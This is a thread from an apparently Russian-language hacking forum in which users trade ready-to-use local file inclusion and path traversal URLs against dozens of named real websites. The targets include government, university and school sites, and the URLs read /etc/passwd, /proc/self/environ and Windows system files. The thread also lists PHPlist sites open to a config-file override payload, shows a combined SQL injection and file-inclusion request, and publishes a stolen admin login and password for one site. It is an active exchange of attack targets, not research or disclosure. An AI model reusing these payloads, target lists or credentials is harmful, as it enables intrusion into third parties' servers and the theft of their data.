PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. August12

    August12 Member

    Joined:
    11 Nov 2007
    Messages:
    4
    Likes Received:
    7
    Reputations:
    1
    Greetz again here a little site in Netherlands

    www.catchlight.nl/index.php?pagina=../../../../../../../../../../etc/passwd%00
     
  2. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.atlllc.com/atlantis.php?page=/etc/passwd%00
    Code:
    http://www.naturesgoodness.com.au/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
    Code:
    http://www.outlets.ca/cgi-bin/tseekdir.cgi?location=/etc/passwd%00
     
    #842 S0ulVortex, 7 Mar 2009
    Last edited: 7 Mar 2009
  3. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Code:
    http://anapacenter.info/index.pl?id=../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.zambezigroceries.com/index.php?page=../../../../../../../../../proc/self/environ
     
    2 people like this.
  5. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    www.dnocs.gov.br/php/util/downloads_file.php?&dir=&file=/etc/passwd
     
    1 person likes this.
  6. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.durangotelegraph.com/index.php?inc=/../../../../../../../../../../../../../../etc/passwd
    http://www.ege.fcen.uba.ar/index.php?inc=../../../../../../../../../../../../../../etc/passwd
    http://www.freulerchilbi.ch/index.php?inc=../../../../../../../../../../../../../../etc/passwd
    http://www.mombergstube.de/index.php?inc=../../../../../../../../../../../../../../etc/passwd
    http://www.q3s.de/portfolio/index.php?inc=../../../../../../../../../../../../../../etc/passwd
    http://www.helpwithmath.com/index.php?include=../../../../../../../../../../../../../../etc/passwd

    http://www.biodieselcambodia.com/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
    http://www.christianalbrecht.de/au/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
    http://www.dogwalker.com.br/blog/index.php?inc=../../../../../../../../../../../../../../proc/self/environ

    Мешает open_basedir
    http://pdcon.cz/elearning/obcan/index.php?inc=open_basedir
    http://www.zeegersloot.nl/index.php?inc=open_basedir
    http://www.mediahostnet.com/v2/index.php?inc=manual&p=open_basedir
    http://www.outtatime.com.au/index.php?inc=open_basedir
    http://stramberk.ecn.cz/index.php?inc=open_basedir
    http://www.dieschwarzataler.at/album/index.php?inc=open_basedir
    http://www.zonabern.ch/index.php?inc=open_basedir
    http://www.stufenlos.ch/index.php?inc=open_basedir
    http://kompaktservice.com/index.php?include=open_basedir

    Read File | windows
    http://classicandbasic.sytes.net/classic/index.php?inc=windows_inc
    http://www.kyoto-eiyoiryo.ac.jp/kisotsu/index.php?inc=windows_inc
    http://www.doh.gov.za/hmtp/index.php?include=windows_inc
    http://www.cafda.org.za/index.php?include=windows_inc
    http://www.fes.org.za/index.php?include=windows_inc
    http://www.fawu.org.za/index.php?include=windows_inc
    http://www.lionfunds.co.za/index.php?include=windows_inc
     
    8 people like this.
  7. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Чёрным по черному
    http://www.venturesnowboards.com/index_07.php?inc=../../../../../../../../../../../../../etc/passwd
     
    #847 InFlame, 9 Mar 2009
    Last edited: 9 Mar 2009
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.artdesigner.ru/?f=web&p=Локальный инклюд (Стоят Chmod'ы :( )
    http://www.artoi.ru/index.php?p=х.з. вроде инклюд
     
  9. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    http://sportskenovosti.hr/index.php?cmd=../../../../etc/passwd%00
    Code:
    http://support.novusnow.ca/internet/index.php?cmd=../../../etc/passwd%00
    Code:
    http://www.rv-nrw.de/page.php?include=../../../../../../etc/passwd
     
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    sql injection+php include - т.к. вывода нету то можно узать как php include.
    PHP:
    http://www.swsys.ru/index.php?page=53+union+select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2e2e2f626f6f742e696e69,6,7,8--+
     
    1 person likes this.
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    пик.орг

    Code:
    http://www.peek.org/bryan/game/dnd.php?p=../../../../../../../../etc/passwd%00
     
    _________________________
    1 person likes this.
  12. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    Code:
    http://www.amacanada.org/template.php?fileName=../../../../../../../../../../../../../../../../../etc/passwd
    Code:
    http://www.syntasoft.com/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
    Code:
    http://www.supreme-commander.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
    Code:
    http://4ertim.com/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
    Code:
    http://prospectinfo.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
     
    #852 [Dezzter], 17 Mar 2009
    Last edited by a moderator: 17 Mar 2009
  13. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.nccs.biz/lebanonballetschool/display.php?page=display.php

    тама редирект так чо открывать каким нить AccessDiver!
    100 пост )))
     
  14. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    Code:
    http://www.autobahn24.net/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
    Code:
    http://www.liga24.org/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
    Code:
    http://www.rechtsberater-cccr.de/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
    и немного клубнички:
    Code:
    http://www.wildhookups.com/hosted/index.php?wm_login=hornyguys&cf=&geo=&app=&sub=&site=man_hook_ups1&page=../../../../../../../../../../../../../../../../../etc/passwd
     
    #854 [Dezzter], 17 Mar 2009
    Last edited by a moderator: 17 Mar 2009
  15. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    http://www.broughton.nsw.edu.au/casc/template.php?include=../../../../../../../../../../../../../../etc/passwd&heading=Links
     
  16. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    а тут phpinfo() :
    возможно просматривать директории т.к. используется fopen + потому что ось FreeBSD (Морок)

    Как пример http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/

    если кто сможет найти пароли от фтп киньте плиз в личку оч прошу)))
     
    _________________________
    #856 KIR@PRO, 18 Mar 2009
    Last edited: 9 Apr 2009
  17. August12

    August12 Member

    Joined:
    11 Nov 2007
    Messages:
    4
    Likes Received:
    7
    Reputations:
    1
    PHPlist Bug

    Post Command:

    _SERVER[ConfigFile]=../../../../../../../../../../../etc/passwd

    http://www.scythe-eu.com/newsletter/lists//admin/index.php
    http://newsletter.mdg-unternehmensberatung.de/newsletter/lists//admin/index.php
    http://www.rmaxinternational.com/newsletter/lists//admin/index.php
    http://www.kulinaria-mehr.de/newsletter/lists//admin/index.php
    http://www.oil-price.net:8000/newsletter/lists//admin/index.php
    http://news.eu123.info/newsletter/lists//admin/index.php
    http://unicornnight.com/Newsletter/lists//admin/index.php
    http://www.london-executive.com/newsletter/lists//admin/index.php
    http://www.ready2move.be/newsletter/lists//admin/index.php
    http://www.tstratmann.de/newsletter/lists//admin/index.php
    http://www.lightupxmas.com/newsletter/lists//admin/index.php
    http://www.dirtragmag.com/newsletter/lists//admin/index.php
    http://www.ehl.edu/newsletter/lists//admin/index.php
    http://markdionsbartramstravels.com/newsletter/lists//admin/index.php
    http://www.lumifilm.fi/newsletter/lists//admin/index.php
    http://www.nvcaz.com/newsletter/lists//admin/index.php
    http://www.nwa.cc/newsletter/lists//admin/index.php
    http://www.euroindy.com/portal/newsletter/lists//admin/index.php
    http://www.stone-flooring-tips.com/newsletter/lists//admin/index.php
    http://www.tangleweed.org/mail/lists//admin/index.php
    http://www.dirtysouthevents.com/mail/lists//admin/index.php
    http://www.osdnashville.org/newsletter/lists//admin/index.php
    http://oldtownaa.com/mail/lists//admin/index.php
    http://odnavaiaescola.com/mail/lists//admin/index.php
     
    1 person likes this.
  18. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    http://www.kozcollective.nl/site2/index.php?pagefile=../../../../../../../../../../../../etc/passwd%00
    http://www.accessibility.nl/games/index.php?pagefile=../../../../../../../../../../../etc/passwd%00
     
  19. Морок

    Морок New Member

    Joined:
    6 Mar 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    1
    http://iskatel.org/

    http://iskatel.org/?p=4&id=../../admin.php%00

    login:Minerale
    pass:03051968

    Админка: http://iskatel.org/admin.php

    P.S. 2 KIR@PRO : Диры читаются не потому что fopen, а потому что ось FreeBSD
     
    1 person likes this.
  20. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    http://www.cyclingnews.com/interviews.php?id=../../../../../../../../../../../../../../../../../../../../../etc/passwd%00